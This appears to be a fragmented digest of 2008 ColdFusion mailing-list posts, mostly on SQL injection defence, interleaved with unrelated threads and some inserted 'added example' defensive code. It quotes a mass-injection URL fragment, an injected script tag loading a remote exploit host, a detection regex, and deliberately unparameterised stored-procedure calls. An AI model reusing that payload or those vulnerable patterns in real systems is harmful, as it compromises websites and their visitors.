I was just looking at a 'user monitor' page on one of my sites and saw the
URL string below being called. I've seen several SQL injection URLs before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che
/rss.cfm?';DECLARE @S CHAR(4000);SET
Dear ColdFusion Users,
Is there a way that I can attach to a datasource through an event like
before_commit or before_update?
So, if I have a cfquery tag, and I would ColdFusion to automatically, before
ColdFusion executes the code found in the cfquery I would like it to
automatically execute
Joseph,
I don't think what you are trying to do is possible. Can you give us some
more details of what you are trying to accomplish to see if we can help you
come up with an alternative solution?
Sincerely,
Dave Phillips
-Original Message-
From: Joseph Bugeja [mailto:[EMAIL PROTECTED]
Well you can use database triggers on tables for this matter, if your
queries are related to simple tables...
Greetings from Switzerland
Gert Franz
Railo Technologies GmbH
[EMAIL PROTECTED]
www.railo.ch
Join our Mailing List
german:http://de.groups.yahoo.com/group/railo/
english:
I'm looking for milliseconds to shave off an app that creates XML
files. It consists of a cfc that takes a bean with LOTS of getters
and setters, and makes an XML file out of it.
What i have now is a cfc that has 107 methods. Each method makes a
fragment of the XML file, with some conditional
Thanks for your reply. Let me explain our scenario.
We have a number of cfquery tags that insert, update and delete data from our
Oracle database. Basically, before each query is run I need to execute a stored
procedure. This stored procedure sets the userid (the user currently logged in)
in
Are you using components for all your data access transactions (ie.
dao, etc)? If so, and you are using ColdSpring (or some other bean
factory) to manage your cfcs, this would be a perfect place for AOP.
If you are not using a bean factory, you could create a lightweight
aop style function /
This attack has nothing to do with elevation of privilege. It simply
tacks on a SQL procedure to a query existing on the page already. This
procedure then runs through the tables/columns in the database
appending text the end of content in varchar fields. The text appended
varies, but what I've
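A request-level check for the shape of this campaign, as an added example that is not code from this thread or from Portcullis: an Application.cfc whose onRequestStart logs and refuses any request whose decoded query string or form field contains the `DECLARE @S CHAR(4000);SET` pattern from the URL at the top of the thread. The application name, the log file name and the 400 response are assumptions. It is a signature for one campaign, meant to run alongside cfqueryparam, not in place of it.

```cfml
<!--- Added example, not from the thread or from Portcullis.
      Application.cfc: log and refuse requests carrying the
      ';DECLARE @S CHAR(4000);SET ... shape. Input is URL-decoded before
      matching so %20 / + encodings do not slip past the pattern. --->
<cfcomponent output="false">
    <cfset this.name = "rssSite">   <!--- assumed application name --->

    <cffunction name="looksLikeMassSqli" access="public" returntype="boolean" output="false">
        <cfargument name="candidate" type="string" required="true">
        <cfset var decoded = urlDecode(arguments.candidate)>
        <!--- DECLARE @<name> [N][VAR]CHAR(<len>) ; SET @<name> ... --->
        <cfreturn reFindNoCase("DECLARE\s+@\w+\s+N?(VAR)?CHAR\s*\(\s*\d+\s*\)\s*;?\s*SET\s+@", decoded) GT 0>
    </cffunction>

    <cffunction name="onRequestStart" access="public" returntype="boolean" output="false">
        <cfargument name="targetPage" type="string" required="true">
        <cfset var key = "">
        <cfset var suspect = looksLikeMassSqli(cgi.query_string)>

        <!--- the same payload arrives through POSTed form fields as well --->
        <cfloop collection="#form#" item="key">
            <cfif looksLikeMassSqli(form[key])>
                <cfset suspect = true>
            </cfif>
        </cfloop>

        <cfif suspect>
            <!--- "sqli_attempts" is an assumed log file name --->
            <cflog file="sqli_attempts" type="warning"
                   text="#cgi.remote_addr# #arguments.targetPage# #left(urlDecode(cgi.query_string), 500)#">
            <cfheader statuscode="400" statustext="Bad Request">
            <cfabort>
        </cfif>
        <cfreturn true>
    </cffunction>
</cfcomponent>
```

The logged line gives you the source address and the decoded request, which is enough to correlate with the database checks later in the thread; the refusal is optional and can be dropped if you only want visibility.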
Even if you split it out, would the processing page not still end up calling
the same amount of methods unless you could redesign the build process
somehow? I sometimes wonder if speed is the ultimate goal and at any cost
if it might just be better to use included files with UDFs when needed over
Joseph,
I think Gert's suggestion earlier could work for you. You could design a
trigger to fire the stored procedure prior to any Inserts or Updates. Check
out this page on oracle site for some direction:
http://tinyurl.com/5sjhlg
I haven't done anything with triggers myself. But if you
Richard,
You may want to check out the documentation on application.cfc before going any
further...
Gary
You could make them fire based upon a null value or value not being set at
all. For example if UserID is in fact passed in then do not fire trigger
but if UserID is not passed in then fire the trigger. I think that would
then work fine for the CF pages interacting with things and then when
Thanks again for your reply.
Unfortunately, I need to pass the userid prior to executing each query as
otherwise the auditing function would not know the userid. We have triggers on
tables but triggers need to read the userid a priori.
ColdFusion does not allow us to build our connection
The logic has 3 or 4 major branches, so the total number of methods
called is about a third or a quarter of the total.
So the choice is to instantiate one 3000 line cfc with 107 methods
only some of which get used, against 2 or 3 smaller cfcs where all the
methods get used.
So does anyone have an
The purpose of the hack is to change your website, so that each visitor is
hit with a series of browser exploit attempts while reading your website.
Some of the exploits attempted are handled by the MS patch. Some are not.
(Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton,
Got it. Now I understand better. You want to pass the userid of your
'logged in user' to track the change in the database instead of using the
user id that the datasource is logged in as.
I don't see any way for you to do this without changing your code. Maybe
someone else can come up with
Are you storing the XML as a string or using a the native CF XML object?
When working with large strings, I've obtained big speed increases by using
a Java String Buffer object.
On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote:
The logic has 3 or 4 major branches, so the total
I know when one of our guys decided to take a complex series of included
files and put it into 4 CFCs to make things easier to manage that the pages
actually slowed down. When he started to back track through things it
appeared the added overhead was from all of the method calls he was then
Exactly!
You perfectly understood my concern. If ColdFusion supported dynamic connection
parameter injection or proxy authentication then we can identify the connection
pool users but there is no straightforward solution to this. Through pooling we
are connected through one db user which for
http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.html
Well, thanks. That worked to get me the number of the character. It's 8226.
That will help.
I have to add, this is the second time I've copied a routine directly from
the Adobe web site, and it's the second time it
No, because those sites are still using the URL variables, just not visibly.
andy
-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 3:39 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Here's another
Just a guess but it sounds more like the CF's infamous string manipulation
memory issue than a CFC issue. This issue, and various workarounds, was
covered in great detail on CF talk about a month or so ago. I would do a
search on the cf_talk list looking for Memory issue string manipulation
java
I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for
your site.
http://portcullis.riaforge.org/
--
Portcullis is a CFC based url,form,cookie filter to help protect against SQL
Injection and XSS (Cross Site Scripting) attacks. This CFC can help filter
Joseph,
I did some googling and found that Oracle has 'proxy user authentication'.
See this Ask Tom article (someone wanting to do the same thing as you are,
but in java):
http://tinyurl.com/6qe8xk
Although I don't know if you can do it with the ColdFusion setup directly,
but maybe you can
Hi
cfdump with a cfc shows the methods of the cfc. Is there an easy way to
see the values stored in CFC? Does it work recursively, so if a cfc
member points to another cfc instance, then that cfc is dumped in the
same way?
We're on cfmx 6 and also 7.
Thanks
Mark
Let me just jump in with a quick question or two about this...
Is this something that using cfqueryparam doesn't take care of?
Is this a serious enough problem that we need to use such measures
as Portcullis to defend our sites?
I do see form injection attempts at times through forms on my
Similar to how other people store instance data, I create a CFC-based
struct variable, usually named instance. Then, I create a
getInstance() function that returns the instance struct.
It will show me everything stored at the point in time the struct
variable is dumped.
It's not recursive,
Dave,
That's exactly what I was looking for - proxy authentication. I created a
thread on this forum about this but the reply I got is that ColdFusion does not
natively support this. So, the solution is to either create our own JNDI
datasource using Java. However, I decided to not go this way
Why not just set it in their session and then you are only setting it once
and referencing that for each query you execute.
On Tue, Jul 22, 2008 at 9:06 AM, Joseph Bugeja [EMAIL PROTECTED] wrote:
Dave,
That's exactly what I was looking for - proxy authentication. I created a
thread on this
Hominid: Any member of the biological family Hominidae (the great apes),
including the extinct and extant humans, chimpanzees, gorillas, and
orangutans.
Thank you.
Adrian :OD
-Original Message-
From: Brian Kotek [mailto:[EMAIL PROTECTED]
Sent: 03 June 2008 21:08
To: CF-Talk
Subject: Re:
Hello folks:
The discussion yesterday regarding using CFqueryparam to protect sites from
SQL Injection attacks got me thinking. Well, it is easy enough to use
CFQUERYPARAM everywhere inside CFQUERY tags, wherever a variable is passed
to the SQL query.
However, how do you do that with
Why not pass both to the proc, then rewrite the proc so that rather than
testing for its existence, you're testing for whether or not it's blank?
-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 9:21 AM
To: CF-Talk
Subject: writing protected CF
Yup, you're making sense. The way around it is to pass NULL in using:
cfprocparam null=true
Adrian
-Original Message-
From: Qing Xia [mailto:[EMAIL PROTECTED]
Sent: 22 July 2008 15:21
To: CF-Talk
Subject: writing protected CF with CFStoredProc
Hello folks:
The discussion yesterday
Is there an easy way to see the values stored in CFC?
In my CFCs I place all instance variables into an instance struct. Then I
can use:
<cffunction name="getMemento" access="public" returntype="Struct" output="false">
    <cfargument name="collection" type="struct" required="false" default="#structNew()#">
    <!--- merge this CFC's instance data into the supplied (or a fresh) struct --->
    <cfset structAppend(arguments.collection, variables.instance)>
    <cfreturn arguments.collection>
</cffunction>
What's wrong with using:
<cfquery ...>
    exec sps_testproc
    <cfif whichvar EQ "A">
        @aid = <cfqueryparam value="123" cfsqltype="cf_sql_integer">
    <cfelse>
        @bid = <cfqueryparam value="456" cfsqltype="cf_sql_integer">
    </cfif>
</cfquery>
Oh yeah, you are right, of course. There is no NULL in CF so if I do a
Value=NULL that will only confuse SQL.
Cool, thanks!
On Tue, Jul 22, 2008 at 10:27 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:
Yup, you're making sense. The way around it is to pass NULL in using:
cfprocparam null=true
True! I can certainly do this as well.
On Tue, Jul 22, 2008 at 10:40 AM, morgan l [EMAIL PROTECTED] wrote:
What's wrong with using:
<cfquery ...>
    exec sps_testproc
    <cfif whichvar EQ "A">
        @aid = <cfqueryparam value="123" cfsqltype="cf_sql_integer">
    <cfelse>
In your example you are altering the behavior of the query based upon input
which does not affect injection attacks. The idea of protecting against
injection attacks is to stop invalid values from being executed within the
query/SP.
Take for example this query:
delete from customer where
Mark,
I went to your site Coldfusionmuse to read about that attack. I then noticed
the link to cfwebtools at the top. Needing some help with a project, I looked
at one of the sites they helped create only to see that same SQL injection
attack had succeeded on the site (www.rentiowa.com).
Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to
see what Brian was talking about and now I see the reference to a .js file
on one of the pages. I didn't just infect my pc with something, did I?
I surely hope that we are not perpetuating some virus with these e-mails.
Yes, it sucks that the option is not available for the entire band. For it to
suppress the footer, you have to set all of the fields' Remove line when
blank property to true in the footer section. Also if there is blank space
between your fields/lines try adding dummy labels with just a space
Yes, I'll work on something like that but it requires heavy testing to make
sure that the solution is correct. Pooling is quite a difficult topic and not
very much documented topic (I could not find a document that explains how the
ColdFusion driver is communicating with Oracle - like what if
Okay, stupidly, I clicked on rent.com (? Used to avoid
perpetuation) to see what Brian was talking about and now I
see the reference to a .js file on one of the pages. I
didn't just infect my pc with something, did I?
I surely hope that we are not perpetuating some virus with
I went to your site Coldfusionmuse ...
Please send vulnerability discoveries to the appropriate individuals, not to
mailing lists.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in
Brian and all,
I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem is that like a lot of dev shops - we don't keep
up with our portfolio of customers on our own web site. I have removed the
link to Rent Iowa. They have not been an active customer
It's ok dave... I put myself out there after all
-mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 2:09 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Ma
rk Kruger
I went to your site
i have been asked to look at a possible sql injection attack. as I look
through the code I see stored procs being called by using cfquery like:
<cfquery name="asdf" datasource="asdf">
    storedproc '#var1#', '#var2#'
</cfquery>
I've read about using cfstored procs and params to prevent
Yes you are vulnerable if you do not sanitize the inputs.
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Tim Do [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 2:28 PM
To: CF-Talk
Subject:
As you have heard, cfquery is vulnerable to sql injection attacks, so
you have to do something.
You will hear that cfqueryparam is the best practice for protecting
against sql injection attacks, and there is certainly truth to that.
However, there are also costs associated with cfqueryparam.
(Depending
on the version of CF, cfqueryparam disables cachedwithin caching.
This is true, but it doesn't prevent you from baking your own caching
mechanism as many have done.
In
all versions of CF, cfqueryparam effectively makes Sql Profiling with
SQL Server useless and there is no
A couple of approaches to order by
http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-
by
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED]
I've used this function to view the SQL with the param data in place.
<cffunction name="executedSQL">
    <cfargument name="result">
    <cfset var LOCAL = {}>
    <cfset LOCAL.sqlString = ARGUMENTS.result.sql>
    <cfif StructKeyExists(ARGUMENTS.result, "sqlParameters")>
        <!--- replace each ? placeholder, left to right, with its bound value --->
        <cfloop array="#ARGUMENTS.result.sqlParameters#" index="LOCAL.param">
            <cfset LOCAL.sqlString = Replace(LOCAL.sqlString, "?", "'#LOCAL.param#'", "one")>
        </cfloop>
    </cfif>
    <cfreturn LOCAL.sqlString>
</cffunction>
you are correct Dave..
Mark..I apologize for my post. I thought it was interesting following the
links from the original thread to see a site with that exact attack.
Brian
I went to your site Coldfusionmuse ...
Please send vulnerability discoveries to the appropriate individuals, not to
Mark,
I apologize for posting it the way I did. I did find it interesting finding
the exact attack on a site that was being discussed in the thread. Please
forgive me.
Brian
Brian and all,
I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem
Brian,
No worries. You just cost me an hour of my life approving changes to our
portfolio section (ha).
-mark
-Original Message-
From: Brian Yager [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 3:52 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My
Hi Brad
Thanks for the links, those are interesting articles.
The problem with MS SQL Profiler and cfqueryparam is that the sql that
arrives at the sql server replaces the literal sql with something like
sp_exec 72 (I forget the actual sp name) followed by the parameters
(which are easily
Thanks Adrian. That's cool. however, it is not useful DURING the execution
of the SQL though correct?
~Brad
- Original Message -
From: Adrian Lynch [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July 22, 2008 3:51 PM
Subject: RE: cfquery and cfstoredproc
I tracked down a defect to a piece of code which basically did the
following:
total = form.quantity * form.itemamount
In some cases, form.quantity is coming through as *1,1* which is presumably
due to an HTML issue with duplicate form fields with the same name.
But rather than getting a CF
I see. Thanks for the clarification on the Profiler stuff. Unfortunately, I
don't have MSSQL in front of me to play with it right now.
I give SeeFusion two thumbs way up on monitoring your SQL traffic and run
times. (it incorporates a JDBC URL wrapper) I use a custom monitor I wrote
for SQL
Looked like it could be a ColdFusion date value to me. So I did a
dateFormat() on that and came up with 01/01/2008:
<cfset nValue = "1,1" * 1>
<cfoutput>#dateFormat(nValue, "mm/dd/yyyy")#<br><br></cfoutput>
It's assuming 1,1 is the current month and year. I did the same for
5,23 * 1 and got 05/23/2008.
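The defensive side of that observation, as an added example that is not code from the original poster: validate each form value as a number before any arithmetic, so a duplicated field arriving as "1,1" (or an empty or non-numeric value) is rejected instead of being silently coerced to a date. The function name requireNumber and the form field names are taken from the defect description above; the thrown exception type is an assumption.

```cfml
<!--- Added example, not from the thread. isValid("integer") and
      isValid("numeric") are false for "1,1", "" and "abc", so none of
      them reach the multiplication that CF would otherwise treat as
      date arithmetic. --->
<cffunction name="requireNumber" access="public" returntype="numeric" output="false">
    <cfargument name="raw" type="string" required="true">
    <cfargument name="fieldName" type="string" required="true">
    <cfargument name="allowDecimal" type="boolean" required="false" default="false">
    <cfset var value = trim(arguments.raw)>
    <cfset var kind = "integer">
    <cfif arguments.allowDecimal>
        <cfset kind = "numeric">
    </cfif>
    <!--- OR short-circuits, so the comparison only runs on a real number --->
    <cfif NOT isValid(kind, value) OR value LTE 0>
        <cfthrow type="InvalidInput"
                 message="#arguments.fieldName# must be a positive number."
                 detail="received [#arguments.raw#]">
    </cfif>
    <cfreturn value>
</cffunction>

<cfparam name="form.quantity" default="">
<cfparam name="form.itemamount" default="">

<!--- "1,1" * 2.50 would have produced a date serial times a price;
      now it produces an InvalidInput exception the page can report --->
<cfset total = requireNumber(form.quantity, "quantity")
             * requireNumber(form.itemamount, "itemamount", true)>
```

Rejecting the list form outright is deliberate: taking the first element would hide the duplicate-field bug that produced it.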
i have been asked to look at a possible sql injection attack.
as I look through the code I see stored procs being called
by using cfquery like:
<cfquery name="asdf" datasource="asdf">
    storedproc '#var1#', '#var2#'
</cfquery>
I've read about using cfstored procs and params
Dave,
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
-Original Message-
From: Dave Watts
What about a semi-colon?
Storedproc '#var1#','#var2#' ; *other code*
Would the CFQUERY not allow this additional code to run?
It wouldn't allow any of the values after the stored procedure call
storedproc to run as code, because they would be placed in the input
parameters of the stored
So I'm hearing that it should be fine??
Somehow their database column values had the following string appended:
</title><script src=http://1.verynx.cn/w.js></script><!--
So for example the column firstname value John became:
John</title><script src=http://1.verynx.cn/w.js></script><!--
So I'm hearing that it should be fine??
Somehow their database column values had the following
string appended:
</title><script src=http://1.verynx.cn/w.js></script><!--
So for example the column firstname value John became:
John</title><script
The discussion yesterday regarding using CFqueryparam to
protect sites from SQL Injection attacks got me thinking.
Well, it is easy enough to use CFQUERYPARAM everywhere inside
CFQUERY tags, wherever a variable is passed to the SQL query.
However, how do you do that with CFStoredProc?
Dave,
I never disagree with you (usually a fool's errand) but I want a
clarification. I think you might mean that this particular use is safe
because CF will escape the single quotes. But the code below is vulnerable
in exactly the same way as a CFQUERY.
As a test I created an SP
I should have spotted that: i noticed that the difference between 0,1 and
0,2 and 0,3 were 31, 29 and 31, etc. And also that the sequences jumped when
the numbers went from 12 to 13, and likewise around 30. And also leaps of
365 and 366 between 1,32 and 1,33 and 1,34 etc.
So CF is saying, well,
I never disagree with you (usually a fool's errand)
Ha! I wish.
but I want a clarification. I think you might mean that this
particular use is safe because CF will escape the single quotes.
But the code below is vulnerable in exactly the same way as a CFQUERY.
As a test I created an SP
Say you had a proc that looked like this:
CREATE PROC sps_testproc
    @AID int = null,
    @BID int = null
AS
    IF @AID IS NOT NULL
        SELECT @AID
    IF @BID IS NOT NULL
        SELECT @BID
If I was using CFQUERY, unprotected-style, I might write this:
cfquery ...
So I'm hearing that it should be fine??
Somehow their database column values had the following
string appended:
</title><script src=http://1.verynx.cn/w.js></script><!--
So for example the column firstname value John became:
John</title><script
Dave,
Do you mind if I blog about that part where you said "Yeah, you're right about
that"? That's got to be good for my cf_streetCred (ha).
-mk
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Tuesday, July 22, 2008 7:14 PM
To: CF-Talk
Subject: RE: cfquery and
Given the nature of this thread, ad hominid attacks is one of the best
Freudian/spell check slip(s) in hominid history.
~G~
On Tue, Jul 22, 2008 at 10:11 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:
Hominid: Any member of the biological family Hominidae (the great apes),
including the extinct
Doooh!
I just got through cleaning the results of this attack out of a clients
database! They have a very old CF application that was poorly written and has
no cfqueryparams!
I must have cleaned 10 tables so far... Funny part is, I warned my client
several months ago after seeing
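A read-only inventory of which string columns carry the appended tag, as an added example that is not Mark's cleanup script: it walks INFORMATION_SCHEMA.COLUMNS on SQL Server, counts matching rows per column with the marker bound as a parameter, and returns the list so each table can be reviewed before any UPDATE is written. The datasource name application.dsn and the marker text passed in the usage line are assumptions.

```cfml
<!--- Added example, not Mark's cleanup script. Finds SQL Server string
      columns that contain a given marker; application.dsn is assumed. --->
<cffunction name="quoteIdent" access="public" returntype="string" output="false">
    <cfargument name="name" type="string" required="true">
    <!--- catalogue names are not user input, but bracket-quote them anyway --->
    <cfreturn "[" & Replace(arguments.name, "]", "]]", "all") & "]">
</cffunction>

<cffunction name="findTaintedColumns" access="public" returntype="array" output="false">
    <cfargument name="dsn" type="string" required="true">
    <cfargument name="marker" type="string" required="true">
    <cfset var cols = "">
    <cfset var n = "">
    <cfset var hits = arrayNew(1)>
    <cfset var hit = "">

    <cfquery name="cols" datasource="#arguments.dsn#">
        SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME
          FROM INFORMATION_SCHEMA.COLUMNS
         WHERE DATA_TYPE IN ('varchar', 'nvarchar', 'text', 'ntext')
    </cfquery>

    <cfloop query="cols">
        <!--- the marker is the only free-form value and it is bound, never concatenated --->
        <cfquery name="n" datasource="#arguments.dsn#">
            SELECT COUNT(*) AS c
              FROM #quoteIdent(cols.TABLE_SCHEMA)#.#quoteIdent(cols.TABLE_NAME)#
             WHERE #quoteIdent(cols.COLUMN_NAME)# LIKE
                   <cfqueryparam value="%#arguments.marker#%" cfsqltype="cf_sql_varchar">
        </cfquery>
        <cfif n.c GT 0>
            <cfset hit = structNew()>
            <cfset hit.schema = cols.TABLE_SCHEMA>
            <cfset hit.table  = cols.TABLE_NAME>
            <cfset hit.column = cols.COLUMN_NAME>
            <cfset hit.rows   = n.c>
            <cfset arrayAppend(hits, hit)>
        </cfif>
    </cfloop>
    <cfreturn hits>
</cffunction>

<!--- usage: the marker is the start of the string reported earlier in the thread --->
<cfdump var="#findTaintedColumns(application.dsn, '</title><script src=')#">
```

Counting first and cleaning second matters here: the appended text starts with a closing title tag, so a blanket REPLACE over every string column would also alter legitimate content that happens to contain HTML.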
I'll admit it. The first time Dave conceded I was right about something, it
got printed out and stuck on my cubicle wall.
Hey, I gotta' celebrate *something* :)
~Brad
- Original Message -
From: Mark Kruger [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July
As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
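Dave's sps_testproc with the numeric-input case Mark raised, as an added example that is not Dave's or Mark's code: the first call drops a number straight into the exec string, where CF's quote escaping never applies; the second binds both arguments with cfprocparam and sends an empty input as a real NULL, which is what Adrian's null=true suggestion earlier in the thread does. url.aid, url.bid and application.dsn are assumptions.

```cfml
<!--- Added example, not from the thread. sps_testproc is the procedure
      Dave posted; url.aid / url.bid and application.dsn are assumed. --->
<cfparam name="url.aid" default="">
<cfparam name="url.bid" default="">

<!--- 1. Unprotected. CF doubles single quotes only inside a quoted string
      literal; an unquoted numeric slot gets no such treatment, so any
      non-numeric input becomes part of the statement (and an empty input
      is a syntax error, which is a symptom of the same problem). --->
<cfquery name="unsafe" datasource="#application.dsn#">
    exec sps_testproc @AID = #url.aid#, @BID = #url.bid#
</cfquery>

<!--- 2. Parameterised. Each argument is bound, cf_sql_integer rejects
      non-numeric input before it reaches SQL Server, and an empty field
      is sent as a genuine NULL so the proc's IS NOT NULL branches behave.
      With null="yes" the value attribute is ignored, as with cfqueryparam. --->
<cfstoredproc procedure="sps_testproc" datasource="#application.dsn#">
    <cfprocparam type="in" cfsqltype="cf_sql_integer"
                 value="#url.aid#" null="#NOT len(trim(url.aid))#">
    <cfprocparam type="in" cfsqltype="cf_sql_integer"
                 value="#url.bid#" null="#NOT len(trim(url.bid))#">
</cfstoredproc>
```

The cfquery-with-cfqueryparam form shown earlier in the thread is equally safe; the cfstoredproc form is simply the one that also handles the NULL default without conditional SQL.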
Actually, I'm gonna pick on you again Dave and challenge this. (I'm
We have an immediate need for a Web Applications Developer. It will be a 3
month project working on several client projects. Position will be primarily
based in the Alexandria, VA office, but that may change to DC Department of
Transportation at the Navy Yard metro. Need to be able to go to